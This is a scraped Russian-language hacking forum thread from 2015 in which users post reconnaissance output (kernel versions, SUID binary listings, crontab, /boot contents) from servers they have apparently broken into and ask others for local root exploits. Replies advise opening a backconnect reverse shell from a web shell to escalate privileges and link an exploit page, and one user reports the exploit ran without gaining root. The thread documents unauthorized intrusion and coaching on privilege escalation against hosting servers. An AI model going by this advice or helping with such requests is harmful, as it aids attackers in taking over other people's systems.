Linux version 3.10.82-timeweb (root@builder.timeweb.ru) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #1 SMP Fri Jul 3 10:11:34 MSK 2015
$ cat /proc/sys/vm/mmap_min_addr
65536
$ pwd
/etc
$ ls -la /usr/bin/staprun

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 31304 Mar 2 2012 /bin/fusermount
-rwsr-xr-x 1 root root 35712 Nov 8 2011 /bin/ping
-rwsr-xr-x 1 root root 36832 Sep 13 2012 /bin/su
-rwsr-xr-x 1 root root 40256 Nov 8 2011 /bin/ping6
-rwsr-xr-x 1 root root 94792 Jun 18 2014 /bin/mount
-rwsr-xr-x 1 root root 69096 Jun 18 2014 /bin/umount
-rwsr-xr-x 1 root root 32232 May 17 2013 /sbin/mount.cifs
-rwsr-xr-x 1 root root 62400 Jul 29 2011 /usr/bin/mtr
-rwsr-xr-x 1 root root 37096 Sep 13 2012 /usr/bin/chsh
-rwsr-xr-x 2 root root 71280 Mar 12 2015 /usr/bin/sudoedit
-rwsr-xr-x 2 root root 71280 Mar 12 2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 42824 Sep 13 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 41832 Sep 13 2012 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 47928 Oct 25 2011 /usr/bin/at
-rwsr-xr-x 1 root root 35712 Nov 8 2009 /usr/bin/tcptraceroute.mt
-rwsr-xr-x 1 root root 32352 Sep 13 2012 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63848 Sep 13 2012 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18912 Nov 8 2011 /usr/bin/traceroute6.iputils
-rwsr-xr-- 1 root dip 321552 Apr 21 20:33 /usr/sbin/pppd
-r-sr-x--- 1 root customers 940632 Dec 28 2012 /usr/sbin/exim4
-rwsr-x--- 1 _lldpd adm 55640 Nov 27 2011 /usr/sbin/lldpctl
-rwsr-sr-x 1 libuuid libuuid 18856 Jun 18 2014 /usr/sbin/uuidd
-rwsr-xr-x 1 root root 10592 Mar 26 2015 /usr/lib/pt_chown
-rwsr-xr-- 1 root messagebus 292944 Nov 25 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10408 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 240984 Aug 18 05:13 /usr/lib/openssh/ssh-keysign
$

foma9999

11.11.2015, 03:30

KIR@PRO said:
↑ (https://antichat.live/posts/3841492/)
А как вы собираетесь понять, что повысили привилегии, если у вас нет стабильной сессии? Сделайте backconnect и с него дальше пробуйте.
Я не говорю, что из-за этого все ваши проблемы, просто повышение привилегий производится из под шелла, когда используется подготовленный код для выполнения с повышенными правами, но большинство эксплоитов попросту повышают права для процесса из под которого они были запущены (в вашем случае это процесс (один из) веб-сервера, который после вывода данных в браузер, завершится и толку от повышения прав нет, а при постоянном коннекте все ваши последующие команды будут выполняться с повышенными привилегиями (при успешном повышении прав соответственно xD )).
p.s. ваш пост - эталон оформления!

Спасибо!

Все равно ошибка та же...

Filipp

26.11.2015, 23:13

uname -a:

Code:
FreeBSD site.com 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Sun Jul 25 23:33:02 UTC 2010 root@wdc-srv.ispsystem.net:/usr/src/sys/amd64/compile/ISPSYSTEM amd64

ls -la /boot:

Code:
total 2004
drwxr-xr-x 7 root wheel 1024 Sep 19 2010 .
drwxr-xr-x 22 root wheel 512 Sep 1 00:11 ..
-r--r--r-- 1 root wheel 7647 Jul 19 2010 beastie.4th
-r--r--r-- 1 root wheel 8192 Jul 19 2010 boot
-r--r--r-- 1 root wheel 512 Jul 19 2010 boot0
-r--r--r-- 1 root wheel 512 Jul 19 2010 boot0sio
-r--r--r-- 1 root wheel 512 Jul 19 2010 boot1
-r--r--r-- 1 root wheel 7680 Jul 19 2010 boot2
-r--r--r-- 1 root wheel 1201 Jul 19 2010 cdboot
drwxr-xr-x 2 root wheel 512 Jul 19 2010 defaults
-r--r--r-- 1 root wheel 703 Jul 19 2010 device.hints
drwxr-xr-x 2 root wheel 512 Jul 19 2010 firmware
-r--r--r-- 1 root wheel 2262 Jul 19 2010 frames.4th
-r--r--r-- 1 root wheel 7535 Jul 19 2010 gptboot
-r--r--r-- 1 root wheel 26895 Jul 19 2010 gptzfsboot
drwxr-xr-x 2 root wheel 29184 Sep 19 2010 kernel
-r-xr-xr-x 1 root wheel 233472 Jul 19 2010 loader
-r--r--r-- 1 root wheel 5865 Jul 19 2010 loader.4th
-rw-r--r-- 1 root wheel 35 Sep 19 2010 loader.conf
-r--r--r-- 1 root wheel 15219 Jul 19 2010 loader.help
-r--r--r-- 1 root wheel 396 Jul 19 2010 loader.rc
-r--r--r-- 1 root wheel 512 Jul 19 2010 mbr
drwxr-xr-x 2 root wheel 512 Jul 19 2010 modules
-r--r--r-- 1 root wheel 512 Jul 19 2010 pmbr
-r--r--r-- 1 root wheel 235520 Jul 19 2010 pxeboot
-r--r--r-- 1 root wheel 703 Jul 19 2010 screen.4th
-r--r--r-- 1 root wheel 35136 Jul 19 2010 support.4th
drwxr-xr-x 2 root wheel 512 Jul 19 2010 zfs
-r--r--r-- 1 root wheel 33280 Jul 19 2010 zfsboot
-r-xr-xr-x 1 root wheel 253952 Jul 19 2010 zfsloader

mount:

Code:
/dev/mfid0s1a on / (ufs, local)
devfs on /dev (devfs, local, multilabel)
/dev/mfid0s1e on /tmp (ufs, local, soft-updates)
/dev/mfid0s1f on /usr (ufs, local, with quotas, soft-updates)
/dev/mfid0s1d on /var (ufs, local, soft-updates)

df -h:

Code:
Filesystem Size Used Avail Capacity Mounted on
/dev/mfid0s1a 496M 310M 146M 68% /
devfs 1.0K 1.0K 0B 100% /dev
/dev/mfid0s1e 496M 161M 295M 35% /tmp
/dev/mfid0s1f 1.7T 66G 1.5T 4% /usr
/dev/mfid0s1d 16G 4.9G 10G 32% /var

cat /etc/crontab:

Code:
# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: src/etc/crontab,v 1.33.2.1.4.1 2010/06/14 02:09:06 kensmith Exp $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz -a

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-r-sr-xr-x 1 root wheel 1008224 Apr 11 2011 /tmp/asd/bin/billmgr
-r-sr-xr-x 1 root wheel 8176 Apr 11 2011 /tmp/asd/cgi/billmgr
-r-sr-xr-x 1 root wheel 42688 Apr 11 2011 /tmp/asd/cgi/xml2csv
-r-sr-xr-x 1 root wheel 105800 Apr 11 2011 /tmp/asd/cgi/report
-r-sr-xr-x 1 root wheel 50728 Apr 11 2011 /tmp/asd/cgi/getattach
-r-sr-xr-x 1 root wheel 52904 Apr 11 2011 /tmp/asd/cgi/getdcfile
-r-sr-xr-x 1 root wheel 70960 Apr 11 2011 /tmp/asd/cgi/ajaxupload
-r-sr-xr-x 1 root wheel 67944 Apr 11 2011 /tmp/asd/cgi/goserver
-r-sr-xr-x 1 root wheel 50344 Apr 11 2011 /tmp/asd/cgi/whoiscgi
-r-sr-xr-x 1 root wheel 50280 Apr 11 2011 /tmp/asd/cgi/domainlist
-r-sr-xr-x 1 root wheel 61928 Apr 11 2011 /tmp/asd/cgi/billupload
-r-sr-xr-x 1 root wheel 43848 Apr 11 2011 /tmp/asd/cgi/domaininfo
-r-sr-xr-x 1 root wheel 20832 Apr 11 2011 /tmp/asd/cgi/partnerprogram
-r-sr-xr-x 1 root wheel 30464 Apr 11 2011 /tmp/asd/cgi/click
-r-sr-xr-x 1 root wheel 44296 Apr 11 2011 /tmp/asd/cgi/ympayment
-r-sr-xr-x 1 root wheel 49384 Apr 11 2011 /tmp/asd/cgi/ymresult
-r-sr-xr-x 1 root wheel 49224 Apr 11 2011 /tmp/asd/cgi/ymcheck
-r-sr-xr-x 1 root wheel 32392 Apr 11 2011 /tmp/asd/cgi/ymfail
-r-sr-xr-x 1 root wheel 32392 Apr 11 2011 /tmp/asd/cgi/ymsuccess
-r-sr-xr-x 1 root wheel 44840 Apr 11 2011 /tmp/asd/cgi/wmpayment
-r-sr-xr-x 1 root wheel 45416 Apr 11 2011 /tmp/asd/cgi/wmresult
-r-sr-xr-x 1 root wheel 49096 Apr 11 2011 /tmp/asd/cgi/assistpayment
-r-sr-xr-x 1 root wheel 62960 Apr 11 2011 /tmp/asd/cgi/assistresult
-r-sr-xr-x 1 root wheel 44424 Apr 11 2011 /tmp/asd/cgi/rbkpayment
-r-sr-xr-x 1 root wheel 45384 Apr 11 2011 /tmp/asd/cgi/rbkresult
-r-sr-xr-x 1 root wheel 53832 Apr 11 2011 /tmp/asd/cgi/cyberresult
-r-sr-xr-x 1 root wheel 45832 Apr 11 2011 /tmp/asd/cgi/cyberpayment
-r-sr-xr-x 1 root wheel 45064 Apr 11 2011 /tmp/asd/cgi/roboxresult
-r-sr-xr-x 1 root wheel 44424 Apr 11 2011 /tmp/asd/cgi/roboxpayment
-r-sr-xr-x 1 root wheel 53608 Apr 11 2011 /tmp/asd/cgi/mobilmresult
-r-sr-xr-x 1 root wheel 44392 Apr 11 2011 /tmp/asd/cgi/zppayment
-r-sr-xr-x 1 root wheel 45256 Apr 11 2011 /tmp/asd/cgi/zpresult
-r-sr-xr-x 1 root wheel 56104 Apr 11 2011 /tmp/asd/cgi/osmpresult
-r-sr-xr-x 1 root wheel 44488 Apr 11 2011 /tmp/asd/cgi/intellimoneypayment
-r-sr-xr-x 1 root wheel 45448 Apr 11 2011 /tmp/asd/cgi/intellimoneyresult
-r-sr-xr-x 1 root wheel 57720 Apr 11 2011 /tmp/asd/cgi/liqpaypayment
-r-sr-xr-x 1 root wheel 70328 Apr 11 2011 /tmp/asd/cgi/liqpayresult
-r-sr-xr-x 1 root wheel 45712 Apr 11 2011 /tmp/asd/cgi/privatpayment
-r-sr-xr-x 1 root wheel 71928 Apr 11 2011 /tmp/asd/cgi/privatresult
-r-sr-xr-x 1 root wheel 62224 Apr 11 2011 /tmp/asd/cgi/moneybookersresult
-r-sr-xr-x 1 root wheel 62224 Apr 11 2011 /tmp/asd/cgi/moneybookerspayment
-r-sr-xr-x 1 root wheel 49096 Apr 11 2011 /tmp/asd/cgi/onpaypayment
-r-sr-xr-x 1 root wheel 50696 Apr 11 2011 /tmp/asd/cgi/onpayresult
-r-sr-xr-x 1 root wheel 44392 Apr 11 2011 /tmp/asd/cgi/prochangepayment
-r-sr-xr-x 1 root wheel 44520 Apr 11 2011 /tmp/asd/cgi/prochangeresult
-r-sr-xr-x 1 root wheel 48680 Apr 11 2011 /tmp/asd/cgi/pppayment
-r-sr-xr-x 1 root wheel 63152 Apr 11 2011 /tmp/asd/cgi/ppresult
-r-sr-xr-x 1 root wheel 44296 Apr 11 2011 /tmp/asd/cgi/2copayment
-r-sr-xr-x 1 root wheel 48936 Apr 11 2011 /tmp/asd/cgi/2coresult
-r-sr-xr-x 1 root wheel 48848 Apr 11 2011 /tmp/asd/cgi/quantgwpayment
-r-sr-xr-x 1 root wheel 48936 Apr 11 2011 /tmp/asd/cgi/quantgwresult
-r-sr-xr-x 1 root wheel 49520 Apr 11 2011 /tmp/asd/cgi/anpayment
-r-sr-xr-x 1 root wheel 48872 Apr 11 2011 /tmp/asd/cgi/anresult
-r-sr-xr-x 1 root wheel 5152 Apr 11 2011 /tmp/asd/sbin/suexec
-r-sr-xr-x 1 root wheel 116616 Apr 11 2011 /tmp/asd/sbin/gatemail
-r-sr-xr-x 4 root wheel 30136 Jul 19 2010 /usr/bin/at
-r-sr-xr-x 4 root wheel 30136 Jul 19 2010 /usr/bin/atq
-r-sr-xr-x 4 root wheel 30136 Jul 19 2010 /usr/bin/atrm
-r-sr-xr-x 4 root wheel 30136 Jul 19 2010 /usr/bin/batch
-r-sr-xr-x 6 root wheel 22848 Jul 19 2010 /usr/bin/chpass
-r-sr-xr-x 6 root wheel 22848 Jul 19 2010 /usr/bin/chfn
-r-sr-xr-x 6 root wheel 22848 Jul 19 2010 /usr/bin/chsh
-r-sr-xr-x 6 root wheel 22848 Jul 19 2010 /usr/bin/ypchpass
-r-sr-xr-x 6 root wheel 22848 Jul 19 2010 /usr/bin/ypchfn
-r-sr-xr-x 6 root wheel 22848 Jul 19 2010 /usr/bin/ypchsh
-r-sr-xr-x 1 root wheel 11568 Jul 19 2010 /usr/bin/lock
-r-sr-xr-x 1 root wheel 25488 Jul 19 2010 /usr/bin/login
-r-sr-xr-x 1 root wheel 7128 Jul 19 2010 /usr/bin/opieinfo
-r-sr-xr-x 1 root wheel 14088 Jul 19 2010 /usr/bin/opiepasswd
-r-sr-xr-x 2 root wheel 8224 Jul 19 2010 /usr/bin/passwd
-r-sr-xr-x 2 root wheel 8224 Jul 19 2010 /usr/bin/yppasswd
-r-sr-xr-x 1 root wheel 14128 Jul 19 2010 /usr/bin/rlogin
-r-sr-xr-x 1 root wheel 11640 Jul 19 2010 /usr/bin/rsh
-r-sr-xr-x 1 root wheel 16936 Jul 19 2010 /usr/bin/su
-r-sr-xr-x 1 root wheel 33960 Jul 19 2010 /usr/bin/crontab
-r-sr-sr-x 1 root daemon 34328 Jul 19 2010 /usr/bin/lpq
-r-sr-sr-x 1 root daemon 34528 Jul 19 2010 /usr/bin/lpr
-r-sr-sr-x 1 root daemon 30344 Jul 19 2010 /usr/bin/lprm
-r-sr-xr-x 1 root wheel 1441528 Nov 3 08:06 /usr/local/ispmgr/bin/ispmgr
-r-sr-xr-x 1 root wheel 1400376 Sep 8 09:29 /usr/local/ispmgr/bin/billmgr
-r-sr-xr-x 1 root wheel 8472 Mar 13 2012 /usr/local/ispmgr/cgi/ispmgr
-r-sr-xr-x 1 root wheel 61808 Aug 1 2013 /usr/local/ispmgr/cgi/cronrun
-r-sr-xr-x 1 root wheel 57488 Aug 1 2013 /usr/local/ispmgr/cgi/mindterm
-r-sr-xr-x 1 root wheel 45320 Jun 1 08:45 /usr/local/ispmgr/cgi/xml2csv
-r-sr-xr-x 1 root wheel 29752 Sep 6 2012 /usr/local/ispmgr/cgi/outlook
-r-sr-xr-x 1 root wheel 35864 Aug 1 2013 /usr/local/ispmgr/cgi/dbdownload
-r-sr-xr-x 1 root wheel 62704 Aug 1 2013 /usr/local/ispmgr/cgi/download
-r-sr-xr-x 1 root wheel 61672 Aug 1 2013 /usr/local/ispmgr/cgi/upload
-r-sr-xr-x 1 root wheel 165760 Nov 3 08:09 /usr/local/ispmgr/cgi/bdownload
-r-sr-xr-x 1 root wheel 165792 Nov 3 08:09 /usr/local/ispmgr/cgi/getuser
-r-sr-xr-x 1 root wheel 8336 Nov 29 2011 /usr/local/ispmgr/cgi/dnsmgr
-r-sr-xr-x 1 root wheel 8336 Nov 17 2011 /usr/local/ispmgr/cgi/ipmgr
-r-sr-xr-x 1 root wheel 8472 Sep 19 2012 /usr/local/ispmgr/cgi/billmgr
-r-sr-xr-x 1 root wheel 138800 Apr 7 2015 /usr/local/ispmgr/cgi/report
-r-sr-xr-x 1 root wheel 59024 Oct 16 2014 /usr/local/ispmgr/cgi/getattach
-r-sr-xr-x 1 root wheel 58832 Oct 16 2014 /usr/local/ispmgr/cgi/getdcfile
-r-sr-xr-x 1 root wheel 99640 Apr 28 2015 /usr/local/ispmgr/cgi/ajaxupload
-r-sr-xr-x 1 root wheel 73392 Mar 6 2015 /usr/local/ispmgr/cgi/goserver
-r-sr-xr-x 1 root wheel 54640 Jun 21 2012 /usr/local/ispmgr/cgi/whoiscgi
-r-sr-xr-x 1 root wheel 54416 Jun 21 2012 /usr/local/ispmgr/cgi/domainlist
-r-sr-xr-x 1 root wheel 62632 Apr 7 2015 /usr/local/ispmgr/cgi/billupload
-r-sr-xr-x 1 root wheel 20920 Aug 22 2012 /usr/local/ispmgr/cgi/partnerprogram
-r-sr-xr-x 1 root wheel 34008 Oct 1 2014 /usr/local/ispmgr/cgi/click
-r-sr-xr-x 1 root wheel 49040 Apr 28 2015 /usr/local/ispmgr/cgi/ympayment
-r-sr-xr-x 1 root wheel 56400 Apr 28 2015 /usr/local/ispmgr/cgi/ymresult
-r-sr-xr-x 1 root wheel 52688 Apr 28 2015 /usr/local/ispmgr/cgi/ymcheck
-r-sr-xr-x 1 root wheel 33360 Apr 28 2015 /usr/local/ispmgr/cgi/ymfail
-r-sr-xr-x 1 root wheel 33360 Apr 28 2015 /usr/local/ispmgr/cgi/ymsuccess
-r-sr-xr-x 1 root wheel 48816 Apr 28 2015 /usr/local/ispmgr/cgi/wmpayment
-r-sr-xr-x 1 root wheel 58400 Apr 28 2015 /usr/local/ispmgr/cgi/wmresult
-r-sr-xr-x 1 root wheel 49360 Apr 28 2015 /usr/local/ispmgr/cgi/assistpayment
-r-sr-xr-x 1 root wheel 49296 Apr 28 2015 /usr/local/ispmgr/cgi/assistresult
-r-sr-xr-x 1 root wheel 48656 Apr 28 2015 /usr/local/ispmgr/cgi/rbkpayment
-r-sr-xr-x 1 root wheel 45392 Apr 28 2015 /usr/local/ispmgr/cgi/rbkresult
-r-sr-xr-x 1 root wheel 49168 Apr 28 2015 /usr/local/ispmgr/cgi/cyberpayment
-r-sr-xr-x 1 root wheel 54064 Apr 28 2015 /usr/local/ispmgr/cgi/cyberresult
-r-sr-xr-x 1 root wheel 48784 Apr 28 2015 /usr/local/ispmgr/cgi/roboxresult
-r-sr-xr-x 1 root wheel 44528 Apr 28 2015 /usr/local/ispmgr/cgi/roboxpayment
-r-sr-xr-x 1 root wheel 53200 Apr 28 2015 /usr/local/ispmgr/cgi/mobilmresult
-r-sr-xr-x 1 root wheel 48688 Apr 28 2015 /usr/local/ispmgr/cgi/zppayment
-r-sr-xr-x 1 root wheel 45712 Apr 28 2015 /usr/local/ispmgr/cgi/zpresult
-r-sr-xr-x 1 root wheel 56432 Apr 28 2015 /usr/local/ispmgr/cgi/osmpresult
-r-sr-xr-x 1 root wheel 48656 Apr 28 2015 /usr/local/ispmgr/cgi/intellimoneypayment
-r-sr-xr-x 1 root wheel 49552 Apr 28 2015 /usr/local/ispmgr/cgi/intellimoneyresult
-r-sr-xr-x 1 root wheel 60640 Apr 28 2015 /usr/local/ispmgr/cgi/liqpaypayment
-r-sr-xr-x 1 root wheel 90720 Apr 28 2015 /usr/local/ispmgr/cgi/liqpayresult
-r-sr-xr-x 1 root wheel 53432 Apr 28 2015 /usr/local/ispmgr/cgi/privatpayment
-r-sr-xr-x 1 root wheel 76544 Apr 28 2015 /usr/local/ispmgr/cgi/privatresult
-r-sr-xr-x 1 root wheel 49104 Apr 28 2015 /usr/local/ispmgr/cgi/pppayment
-r-sr-xr-x 1 root wheel 64984 Apr 28 2015 /usr/local/ispmgr/cgi/moneybookersresult
-r-sr-xr-x 1 root wheel 65784 Apr 28 2015 /usr/local/ispmgr/cgi/moneybookerspayment
-r-sr-xr-x 1 root wheel 53136 Apr 28 2015 /usr/local/ispmgr/cgi/ppresult
-r-sr-xr-x 1 root wheel 44336 Apr 28 2015 /usr/local/ispmgr/cgi/2copayment
-r-sr-xr-x 1 root wheel 49296 Apr 28 2015 /usr/local/ispmgr/cgi/2coresult
-r-sr-xr-x 1 root wheel 48888 Apr 28 2015 /usr/local/ispmgr/cgi/quantgwpayment
-r-sr-xr-x 1 root wheel 49008 Apr 28 2015 /usr/local/ispmgr/cgi/quantgwresult
-r-sr-xr-x 1 root wheel 53304 Apr 28 2015 /usr/local/ispmgr/cgi/anpayment
-r-sr-xr-x 1 root wheel 48976 Apr 28 2015 /usr/local/ispmgr/cgi/anresult
-r-sr-xr-x 1 root wheel 58256 Apr 7 2015 /usr/local/ispmgr/cgi/domaininfo
-r-sr-xr-x 1 root wheel 44752 Apr 28 2015 /usr/local/ispmgr/cgi/prochangeresult
-r-sr-xr-x 1 root wheel 57808 Apr 28 2015 /usr/local/ispmgr/cgi/onpayresult
-r-sr-xr-x 1 root wheel 44496 Apr 28 2015 /usr/local/ispmgr/cgi/prochangepayment
-r-sr-xr-x 1 root wheel 49392 Apr 28 2015 /usr/local/ispmgr/cgi/onpaypayment
-r-sr-xr-x 1 root wheel 48944 Apr 28 2015 /usr/local/ispmgr/cgi/interkassapayment
-r-sr-xr-x 1 root wheel 49136 Apr 28 2015 /usr/local/ispmgr/cgi/interkassaresult
-r-sr-xr-x 1 root wheel 87544 Aug 13 08:07 /usr/local/ispmgr/cgi/save2pdf
-r-sr-xr-x 1 root wheel 49040 Apr 28 2015 /usr/local/ispmgr/cgi/a1payresult
-r-sr-xr-x 1 root wheel 44496 Apr 28 2015 /usr/local/ispmgr/cgi/a1paypayment
-r-sr-xr-x 1 root wheel 16632 Oct 1 2014 /usr/local/ispmgr/cgi/login
-r-sr-xr-x 1 root wheel 63472 Aug 1 2013 /usr/local/ispmgr/cgi/certdownload
-r-sr-xr-x 1 root wheel 58040 Apr 28 2015 /usr/local/ispmgr/cgi/pdresult
-r-sr-xr-x 1 root wheel 44368 Apr 28 2015 /usr/local/ispmgr/cgi/mobimpayment
-r-sr-xr-x 1 root wheel 66768 Aug 22 2012 /usr/local/ispmgr/cgi/cacgi
-r-sr-xr-x 1 root wheel 58168 Apr 28 2015 /usr/local/ispmgr/cgi/paydollar
-r-sr-xr-x 1 root wheel 49296 Apr 28 2015 /usr/local/ispmgr/cgi/newassistresult
-r-sr-xr-x 1 root wheel 48944 Apr 28 2015 /usr/local/ispmgr/cgi/paymasterpayment
-r-sr-xr-x 1 root wheel 49168 Apr 28 2015 /usr/local/ispmgr/cgi/newassistpayment
-r-sr-xr-x 1 root wheel 59360 Apr 28 2015 /usr/local/ispmgr/cgi/paymasterresult
-r-sr-xr-x 1 root wheel 49168 Apr 28 2015 /usr/local/ispmgr/cgi/w2ppayment
-r-sr-xr-x 1 root wheel 53872 Apr 28 2015 /usr/local/ispmgr/cgi/w2presult
-r-sr-xr-x 1 root wheel 30312 Nov 12 2014 /usr/local/ispmgr/cgi/getkb
-r-sr-xr-x 1 root wheel 73040 Apr 28 2015 /usr/local/ispmgr/cgi/telepayresult
-r-sr-xr-x 1 root wheel 36976 Apr 28 2015 /usr/local/ispmgr/cgi/tptest
-r-sr-xr-x 1 root wheel 49104 Apr 28 2015 /usr/local/ispmgr/cgi/webpaypayment
-r-sr-xr-x 1 root wheel 48976 Apr 28 2015 /usr/local/ispmgr/cgi/webpayresult
-r-sr-xr-x 1 root wheel 80920 Apr 28 2015 /usr/local/ispmgr/cgi/cybermobilepayment
-r-sr-xr-x 1 root wheel 83320 Apr 28 2015 /usr/local/ispmgr/cgi/successresult
-r-sr-xr-x 1 root wheel 49168 Apr 28 2015 /usr/local/ispmgr/cgi/unitellerresult
-r-sr-xr-x 1 root wheel 49488 Apr 28 2015 /usr/local/ispmgr/cgi/unitellerpayment
-r-sr-xr-x 1 root wheel 51184 Apr 28 2015 /usr/local/ispmgr/cgi/popayment
-r-sr-xr-x 1 root wheel 59248 Apr 28 2015 /usr/local/ispmgr/cgi/poresult
-r-sr-xr-x 1 root wheel 53528 Apr 28 2015 /usr/local/ispmgr/cgi/upcpayment
-r-sr-xr-x 1 root wheel 48760 Apr 28 2015 /usr/local/ispmgr/cgi/upcresult
-r-sr-xr-x 1 root wheel 49424 Apr 28 2015 /usr/local/ispmgr/cgi/waytopayresult
-r-sr-xr-x 1 root wheel 45488 Apr 28 2015 /usr/local/ispmgr/cgi/waytopaypayment
-r-sr-xr-x 1 root wheel 49072 Apr 28 2015 /usr/local/ispmgr/cgi/braspagpayment
-r-sr-xr-x 1 root wheel 61472 Apr 28 2015 /usr/local/ispmgr/cgi/ymnotifyresult
-r-sr-xr-x 1 root wheel 49296 Apr 28 2015 /usr/local/ispmgr/cgi/ymnotifypayment
-r-sr-xr-x 1 root wheel 57184 Sep 12 2013 /usr/local/ispmgr/cgi/libertyresult
-r-sr-xr-x 1 root wheel 49040 Sep 12 2013 /usr/local/ispmgr/cgi/libertypayment
-r-sr-xr-x 1 root wheel 75800 Apr 28 2015 /usr/local/ispmgr/cgi/copaycoresult
-r-sr-xr-x 1 root wheel 49296 Apr 28 2015 /usr/local/ispmgr/cgi/copaycopayment
-r-sr-xr-x 1 root wheel 49488 Apr 28 2015 /usr/local/ispmgr/cgi/okpayresult
-r-sr-xr-x 1 root wheel 48720 Apr 28 2015 /usr/local/ispmgr/cgi/okpaypayment
-r-sr-xr-x 1 root wheel 49552 Apr 28 2015 /usr/local/ispmgr/cgi/bank24payment
-r-sr-xr-x 1 root wheel 49200 Apr 28 2015 /usr/local/ispmgr/cgi/bank24result
-r-sr-xr-x 1 root wheel 5800 Sep 8 09:29 /usr/local/ispmgr/sbin/suexec
-r-sr-xr-x 1 root wheel 75304 Nov 5 2013 /usr/local/ispmgr/sbin/responder
-r-sr-xr-x 1 root wheel 34856 Aug 1 2013 /usr/local/ispmgr/sbin/vacation
-r-sr-xr-x 1 root wheel 1146432 Nov 3 08:07 /usr/local/ispmgr/sbin/pbackup
-r-sr-xr-x 1 root wheel 1733296 Nov 3 08:08 /usr/local/ispmgr/sbin/usermove
-r-sr-xr-x 1 root wheel 160208 Jul 13 12:53 /usr/local/ispmgr/sbin/gatemail
-r-sr-xr-x 1 root wheel 49232 Apr 28 2015 /usr/local/ispmgr/sbin/mobimresult
-r-sr-xr-x 1 root wheel 432024 Apr 7 2015 /usr/local/ispmgr/sbin/billbackup
---s--x--x 2 root wheel 162136 Oct 16 2010 /usr/local/bin/sudoedit
---s--x--x 2 root wheel 162136 Oct 16 2010 /usr/local/bin/sudo
-rwsr-xr-x 1 root wheel 18120 Oct 25 2010 /usr/local/bin/pkexec
-rwsr-sr-x 1 root mail 92984 Oct 25 2012 /usr/local/bin/procmail
-rwsr-x--- 1 root messagebus 254752 Oct 25 2010 /usr/local/libexec/dbus-daemon-launch-helper
-rwsr-xr-x 1 root wheel 11520 Oct 25 2010 /usr/local/libexec/polkit-agent-helper-1
-r-sr-xr-x 1 root wheel 55464 Feb 21 2011 /usr/local/sbin/mtr
-r-sr-sr-x 1 root authpf 19856 Jul 19 2010 /usr/sbin/authpf
-r-sr-x--- 1 root network 401320 Jul 19 2010 /usr/sbin/ppp
-r-sr-xr-x 1 root wheel 21176 Jul 19 2010 /usr/sbin/timedc
-r-sr-xr-x 1 root wheel 27216 Jul 19 2010 /usr/sbin/traceroute
-r-sr-xr-x 1 root wheel 24480 Jul 19 2010 /usr/sbin/traceroute6

Все что было, всего чего здесь нет -- не было вывода. Помогите с сервом, впервый раз рутаю.

YaBtr

27.11.2015, 11:04

Filipp said:
↑ (https://antichat.live/posts/3920468/)
uname -a:

Code:
FreeBSD site.com 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Sun Jul 25 23:33:02 UTC 2010 root@wdc-srv.ispsystem.net:/usr/src/sys/amd64/compile/ISPSYSTEM amd64

Попробуйте http://0day.today/exploit/14374

Filipp

27.11.2015, 20:59

YaBtr said:
↑ (https://antichat.live/posts/3920598/)
Попробуйте
http://0day.today/exploit/14374

Компилиться без ошибок, выполняю -- бэк дает, все отрабатывает, а рута нету. Не работает(((

GroM88

03.12.2015, 06:34

Подскажите чем штуку такую пробить можно...)

uname -a

Linux 2.6.18 #1 SMP Mon Jul 1 22:13:01 MSD 2013 i686 i686 i386 GNU/Linux

Остальная собранная инфа:

http://pastebin.com/z9eN9Fif

Vip77

22.12.2015, 21:30

Есть что под сие?

uname -a

Code:
Linux ***.com 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

ls -la /boot

Code:
total 43336
dr-xr-xr-x. 4 root root 4096 Oct 14 2014 .
dr-xr-xr-x. 22 root root 4096 Oct 8 03:44 ..
-rw-r--r--. 1 root root 171 Sep 9 2014 .vmlinuz-2.6.32-431.29.2.el6.x86_64.hmac
-rw-r--r--. 1 root root 166 Nov 21 2013 .vmlinuz-2.6.32-431.el6.x86_64.hmac
-rw-r--r--. 1 root root 2519815 Sep 9 2014 System.map-2.6.32-431.29.2.el6.x86_64
-rw-r--r--. 1 root root 2518236 Nov 21 2013 System.map-2.6.32-431.el6.x86_64
-rw-r--r--. 1 root root 105200 Sep 9 2014 config-2.6.32-431.29.2.el6.x86_64
-rw-r--r--. 1 root root 105195 Nov 21 2013 config-2.6.32-431.el6.x86_64
drwxr-xr-x. 3 root root 4096 Oct 13 2014 efi
drwxr-xr-x. 2 root root 4096 Oct 14 2014 grub
-rw-------. 1 root root 15220904 Oct 14 2014 initramfs-2.6.32-431.29.2.el6.x86_64.img
-rw-------. 1 root root 15216205 Oct 13 2014 initramfs-2.6.32-431.el6.x86_64.img
-rw-r--r--. 1 root root 193945 Sep 9 2014 symvers-2.6.32-431.29.2.el6.x86_64.gz
-rw-r--r--. 1 root root 193758 Nov 21 2013 symvers-2.6.32-431.el6.x86_64.gz
-rwxr-xr-x. 1 root root 4131984 Sep 9 2014 vmlinuz-2.6.32-431.29.2.el6.x86_64
-rwxr-xr-x. 1 root root 4128368 Nov 21 2013 vmlinuz-2.6.32-431.el6.x86_64

ls -la --full-time /lib

Code:
total 32
